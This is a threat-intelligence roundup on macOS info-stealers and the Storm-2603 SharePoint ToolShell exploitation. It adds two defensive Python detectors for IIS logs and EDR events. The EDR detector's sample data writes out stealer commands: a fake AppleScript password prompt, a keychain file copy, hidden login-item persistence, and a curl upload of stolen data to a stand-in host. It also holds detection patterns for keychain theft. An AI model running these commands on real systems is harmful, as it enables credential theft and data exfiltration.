Executive Summary
This roundup, compiled in November 2025, covers two converging threats to enterprise environments: a cluster of new macOS information stealers and the Storm-2603 intrusion set, which the cited reporting links to exploitation of the SharePoint "ToolShell" zero-days followed by Warlock ransomware. Threat actors named in the reporting include Storm-2603 and JustAskJacky. Both threads share a pattern: once a foothold is gained (stolen credentials, a phished user, or an unpatched internet-facing server), the attackers move laterally through weakly segmented east-west traffic and hybrid-connectivity paths, ride encrypted channels that are not inspected, and stage data for exfiltration before alerts fire. Credentials, session tokens, and intellectual property were reported stolen across several organizations, with data leaks and operational disruption as the result.
Two trends stand out: high-performance, cross-platform info-stealing malware, and the convergence of cloud, on-prem, and end-user device threats into a single attack path. The counter-measures the cited guidance emphasizes are identity-based policy enforcement, segmentation that actually limits east-west movement, and anomaly detection that covers encrypted and hybrid traffic rather than only the perimeter.
Why This Matters Now
macOS is increasingly targeted by organized threat groups as enterprise cloud and hybrid environments expand, and the same groups now chain endpoint theft with cloud and on-prem exploitation. Because info-stealers evolve quickly and the follow-on activity abuses east-west and encrypted traffic, perimeter-only defenses see little of it; segmentation and visibility inside the environment are where the gap is.
Attack Path Analysis
Initial access most likely came from compromised credentials or an exposed, unpatched service; for the SharePoint thread this was the ToolShell chain listed under Related CVEs, which needs no valid account. Privilege escalation followed through role manipulation or token theft. The adversary then moved laterally across network segments, including container or Kubernetes clusters, to locate sensitive workloads; established covert command and control for tasking and persistence; and exfiltrated data over outbound channels that were not monitored. Reported impact ranged from data theft and disruption to ransomware deployment (Warlock, in the Storm-2603 intrusions).
Kill Chain Progression
Initial Compromise
Description
The adversary obtained access by exploiting internet-exposed services (the SharePoint ToolShell chain below) or by using stolen cloud credentials, typically acquired through phishing; on macOS, the stealers arrived through phishing lures that relied on the user running the payload.
Related CVEs
CVE-2025-49704
CVSS 8.8. Code injection in Microsoft SharePoint Server that lets an authenticated attacker execute arbitrary code over the network; the remote-code-execution half of the "ToolShell" chain, fixed in the July 2025 security update.
Affected Products:
Microsoft SharePoint Server – Subscription Edition, 2019, 2016 (on-premises only; SharePoint Online is not affected, and SharePoint 2013 is out of support and received no fix)
Exploit Status:
exploited in the wild
CVE-2025-49706
CVSS 6.5. Spoofing vulnerability in Microsoft SharePoint Server: a crafted Referer header lets an unauthenticated request reach the ToolPane endpoint, supplying the authentication bypass that CVE-2025-49704 needs. Low score on its own, critical in combination.
Affected Products:
Microsoft SharePoint Server – Subscription Edition, 2019, 2016 (on-premises only)
Exploit Status:
exploited in the wild
CVE-2025-53770
CVSS 9.8. Deserialization of untrusted data in on-premises SharePoint Server allowing unauthenticated remote code execution; a variant of CVE-2025-49704 that evaded the July fix and was exploited as a zero-day before the out-of-band patch. Patching alone is not sufficient: the web shell seen in these attacks reads the server's ASP.NET MachineKey, which lets the attacker forge valid ViewState and keep executing code after the shell is removed, so the keys must be rotated and IIS restarted.
Affected Products:
Microsoft SharePoint Server – Subscription Edition, 2019, 2016 (on-premises only)
Exploit Status:
exploited in the wild
CVE-2025-53771
CVSS 6.3. Spoofing vulnerability in Microsoft SharePoint Server (path-traversal class), the hardened replacement for CVE-2025-49706 that closes the authentication bypass used in the chain.
Affected Products:
Microsoft SharePoint Server – Subscription Edition, 2019, 2016 (on-premises only)
Exploit Status:
exploited in the wild
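As an added example (not code from the original page or from Fortinet, Microsoft, or Red Canary), the following Python script parses IIS W3C logs from a SharePoint front end and flags the ToolShell request sequence: a POST to /_layouts/15/ToolPane.aspx?DisplayMode=Edit carrying a /_layouts/SignOut.aspx Referer (the CVE-2025-49706/53771 bypass), followed by a request for the spinstall*.aspx web shell that the CVE-2025-49704/53770 code execution drops. The log lines, the host name sp.corp, and the IP addresses are constructed for the example; the indicator pattern is the publicly reported one for this chain, not something the page itself documents. A legitimate page-edit POST from an internal user is included to show that the Referer check, not the endpoint alone, is what separates exploitation from normal use.

```python
"""
Detect the ToolShell request pattern (CVE-2025-49706/53771 auth bypass chained
with CVE-2025-49704/53770 RCE) in IIS W3C extended logs.

Added example for this advisory; not code from the page or from any vendor
named in it. Log lines, host name and IP addresses are constructed.
"""
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample log. 10.0.0.5 is a normal user editing a page;
# 203.0.113.7 shows the ToolShell sequence.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip cs(Referer) sc-status
2025-07-19 10:01:02 GET /sites/hr/SitePages/Home.aspx - 10.0.0.5 https://sp.corp/sites/hr 200
2025-07-19 10:01:09 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit&a=/ToolPane.aspx 203.0.113.7 /_layouts/SignOut.aspx 200
2025-07-19 10:01:11 GET /_layouts/15/spinstall0.aspx - 203.0.113.7 - 200
2025-07-19 10:02:30 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit 10.0.0.5 https://sp.corp/_layouts/15/start.aspx 200
"""


def parse_w3c(log_text):
    """Parse IIS W3C extended log text into dicts keyed by the #Fields names."""
    fields, rows = None, []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or fields is None:
            continue  # other directives, or data before any #Fields line
        values = line.split()
        if len(values) != len(fields):
            continue  # truncated or garbled line: skip rather than misalign columns
        rows.append(dict(zip(fields, values)))
    return rows


def is_toolpane_bypass(row):
    """POST to ToolPane.aspx in edit mode whose Referer is SignOut.aspx:
    the unauthenticated bypass (CVE-2025-49706 / CVE-2025-53771)."""
    stem = row.get("cs-uri-stem", "").lower()
    query = unquote(row.get("cs-uri-query", "")).lower()
    referer = unquote(row.get("cs(Referer)", "")).lower()
    return (
        row.get("cs-method", "").upper() == "POST"
        and stem.endswith("/toolpane.aspx")
        and "displaymode=edit" in query
        and referer.endswith("/_layouts/signout.aspx")
    )


def is_webshell_request(row):
    """Request for the spinstall*.aspx page dropped after successful RCE
    (CVE-2025-49704 / CVE-2025-53770); it returns the ASP.NET MachineKey."""
    return "spinstall" in row.get("cs-uri-stem", "").lower()


def analyze(log_text):
    """Return {client_ip: [finding, ...]} for IPs showing ToolShell indicators.
    A bypass followed by a web-shell hit from the same IP is escalated."""
    findings = defaultdict(list)
    for row in parse_w3c(log_text):
        ip = row.get("c-ip", "?")
        if is_toolpane_bypass(row):
            findings[ip].append("toolpane_auth_bypass")
        if is_webshell_request(row):
            findings[ip].append("spinstall_webshell_request")
    for hits in findings.values():
        if "toolpane_auth_bypass" in hits and "spinstall_webshell_request" in hits:
            hits.append("CHAIN: bypass then web shell - treat host as compromised, rotate MachineKey")
    return dict(findings)


if __name__ == "__main__":
    for ip, hits in analyze(SAMPLE_LOG).items():
        print(ip, hits)
```

Run it against real W3C logs by reading the file into `analyze`; the `#Fields:` header is honored, so column order differences between servers do not matter. A hit on `toolpane_auth_bypass` alone is already worth an investigation, since normal SharePoint clients never send a SignOut.aspx Referer to ToolPane.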
MITRE ATT&CK® Techniques
The techniques below are drawn from both threads: Modify Registry applies to the Windows SharePoint hosts in the Storm-2603 intrusions, while AppleScript, Login Items, and Keychain access belong to the macOS stealers.
Phishing (T1566)
User Execution (T1204)
Command and Scripting Interpreter: AppleScript (T1059.002)
Boot or Logon Autostart Execution: Login Items (T1547.015)
Deobfuscate/Decode Files or Information (T1140)
Modify Registry (T1112)
Credentials from Password Stores: Keychain (T1555.001)
Exfiltration Over Web Service (T1567)
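The macOS techniques above (AppleScript, Login Items, Keychain, Exfiltration Over Web Service) tend to appear together within minutes on a victim host, which is what makes them detectable as a chain rather than as individual low-confidence events. The following Python is an added example, not code from the page or from Red Canary: it runs command-line rules over constructed EDR-style process events (timestamps, user names and command lines are made up for the example) and escalates a user to a stealer verdict only when a hidden-answer password prompt, keychain collection and a web upload occur within one time window. A lone `security find-internet-password` from a developer stays an isolated hit, which is the false-positive case a rule-per-technique approach would get wrong.

```python
"""
Correlate macOS stealer tradecraft across process events: an osascript
password prompt (T1059.002 / T1056.002), keychain collection (T1555.001),
Login Item persistence (T1547.015) and upload to a web service (T1567).

Added example for this advisory, not code from the page. All events below
are constructed; field names mirror generic EDR telemetry (ts, user, cmd).
"""
import re
from collections import defaultdict

SAMPLE_EVENTS = [
    {"ts": 100, "user": "alice",
     "cmd": "osascript -e 'display dialog \"macOS needs to update Keychain. Enter your password:\" "
            "default answer \"\" with hidden answer'"},
    {"ts": 103, "user": "alice", "cmd": "security find-generic-password -ga Chrome"},
    {"ts": 104, "user": "alice", "cmd": "cp /Users/alice/Library/Keychains/login.keychain-db /tmp/.k"},
    {"ts": 105, "user": "alice",
     "cmd": "osascript -e 'tell application \"System Events\" to make login item at end "
            "with properties {path:\"/Users/alice/Library/.update\", hidden:true}'"},
    {"ts": 110, "user": "alice", "cmd": "curl -s -F file=@/tmp/out.zip https://paste.example/api/upload"},
    # A developer reading one credential from the keychain: legitimate use.
    {"ts": 300, "user": "bob", "cmd": "security find-internet-password -s git.corp.example"},
]

# (rule name, ATT&CK technique, pattern over the command line)
RULES = [
    ("applescript_password_prompt", "T1059.002 / T1056.002",
     re.compile(r"osascript.*display dialog.*with hidden answer", re.I | re.S)),
    ("keychain_cli_access", "T1555.001",
     re.compile(r"\bsecurity\b.*\b(find-(generic|internet)-password|dump-keychain)\b", re.I)),
    ("keychain_file_copy", "T1555.001",
     re.compile(r"Library/Keychains/login\.keychain-db", re.I)),
    ("login_item_persistence", "T1547.015",
     re.compile(r"System Events.*make (new )?login item", re.I)),
    ("web_upload", "T1567",
     re.compile(r"\bcurl\b.*(-F|--form|-T|--upload-file|-d|--data)\b.*https?://", re.I)),
]

# Each rule maps to a kill-chain stage; the verdict needs three distinct stages.
STAGES = {
    "applescript_password_prompt": "credential_prompt",
    "keychain_cli_access": "keychain_collection",
    "keychain_file_copy": "keychain_collection",
    "login_item_persistence": "persistence",
    "web_upload": "exfiltration",
}
CHAIN_STAGES = {"credential_prompt", "keychain_collection", "exfiltration"}


def match_event(event):
    """Return [(rule name, technique)] for every rule the command line matches."""
    return [(name, tid) for name, tid, rx in RULES if rx.search(event["cmd"])]


def analyze(events, window=600):
    """Group rule hits per user; a user whose first credential prompt, keychain
    collection and exfiltration all fall within `window` seconds is a stealer chain."""
    per_user = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        for name, tid in match_event(ev):
            per_user[ev["user"]].append((ev["ts"], name, tid))
    report = {}
    for user, hits in per_user.items():
        first_seen = {}
        for ts, name, _ in hits:
            first_seen.setdefault(STAGES[name], ts)  # earliest time per stage
        span = max(first_seen.values()) - min(first_seen.values())
        chain = CHAIN_STAGES <= set(first_seen) and span <= window
        report[user] = {
            "hits": [name for _, name, _ in hits],
            "stages": sorted(first_seen),
            "verdict": "stealer_chain" if chain else "isolated_hit",
        }
    return report


if __name__ == "__main__":
    for user, result in analyze(SAMPLE_EVENTS).items():
        print(user, result["verdict"], result["hits"])
```

Persistence is recorded but deliberately not required for the verdict, since some stealers run once and leave nothing behind; it raises confidence when present. Wire real telemetry in by mapping your EDR's process-start records onto the same three fields.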
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Strong Access Control Measures
Control ID: 8.3.1
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA (Digital Operational Resilience Act) – ICT Risk Management Framework
Control ID: Article 9
CISA ZTMM 2.0 – Identity Policy Enforcement
Control ID: Identity Pillar - Policy Enforcement
NIS2 Directive – Technical and Organisational Measures
Control ID: Article 21
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Financial Services
Financial institutions combine macOS-heavy workforces with hybrid cloud estates; credential and session-token theft from endpoints, uninspected encrypted traffic, and coarse segmentation give a single stolen identity a path to payment and trading workloads, and detection that relies on perimeter telemetry will miss it.
Health Care / Life Sciences
Health-care organizations face HIPAA exposure where east-west traffic between clinical systems is unsegmented and anomaly detection does not cover the lateral movement seen in the Storm-2603 and macOS stealer campaigns; internet-facing SharePoint servers holding PHI are a direct risk.
Information Technology/IT
IT providers running cloud-native and Kubernetes workloads are exposed where egress is unrestricted and workload-to-workload traffic is implicitly trusted; a compromised pod or management host then becomes a pivot into tenant environments.
Government Administration
Government agencies with hybrid connectivity between on-prem SharePoint, cloud tenants, and managed macOS fleets rarely have visibility across all three; the Storm-2603 intrusions hit on-premises SharePoint servers including public-sector ones, and macOS stealers supply the credentials needed to reach the rest.
Sources
- Here’s what you missed on Office Hours: November 2025 – https://redcanary.com/blog/security-operations/office-hours-november-2025/
- Inside The ToolShell Campaign – https://www.fortinet.com/blog/threat-research/inside-the-toolshell-campaign
- Microsoft SharePoint Zero-day Attack – https://www.fortiguard.com/outbreak-alert/microsoft-sharepoint-zero-day
- China-backed Storm-2603 deployed ransomware via SharePoint zero-days – https://www.scworld.com/news/microsoft-china-backed-storm-2603-deploys-warlock-ransomware-on-sharepoint-servers
Frequently Asked Questions
Cloud Native Security Fabric (CNSF) Mitigations and Controls
Zero Trust segmentation, network policy enforcement, and egress controls provided by the Cloud Native Security Fabric could have restricted unauthorized lateral movement and data exfiltration, while high-fidelity visibility and anomaly detection would enable rapid threat detection and mitigation across the kill chain.
Control: Zero Trust Segmentation
Mitigation: Prevents unauthorized access to critical infrastructure endpoints.
Control: Threat Detection & Anomaly Response
Mitigation: Detects and alerts on suspicious privilege escalation attempts.
Control: East-West Traffic Security
Mitigation: Blocks unauthorized workload-to-workload or pod-to-pod communication.
Control: Inline IPS (Suricata)
Mitigation: Blocks and detects known malicious C2 patterns in network traffic.
Control: Egress Security & Policy Enforcement
Mitigation: Prevents or alerts on unsanctioned outbound data transfers, enabling rapid containment and limiting operational impact.
Impact at a Glance
Affected Business Functions
- Document Management
- Collaboration Platforms
- Internal Communications
Estimated downtime: 5 days
Estimated loss: $500,000
Potential exposure of sensitive corporate documents and internal communications due to unauthorized access to SharePoint servers.
Recommended Actions
Key Takeaways & Next Steps
- Enforce zero trust segmentation and least-privilege access to restrict initial entry and lateral movement.
- Implement real-time anomaly detection and threat response to catch and contain privilege escalation and C2 activity.
- Apply strict egress filtering and inline IPS to identify and block data exfiltration attempts.
- Leverage Kubernetes and east-west firewalling to isolate workloads and prevent lateral attack paths.
- Centralize multi-cloud visibility and automate policy enforcement for rapid containment during active threats.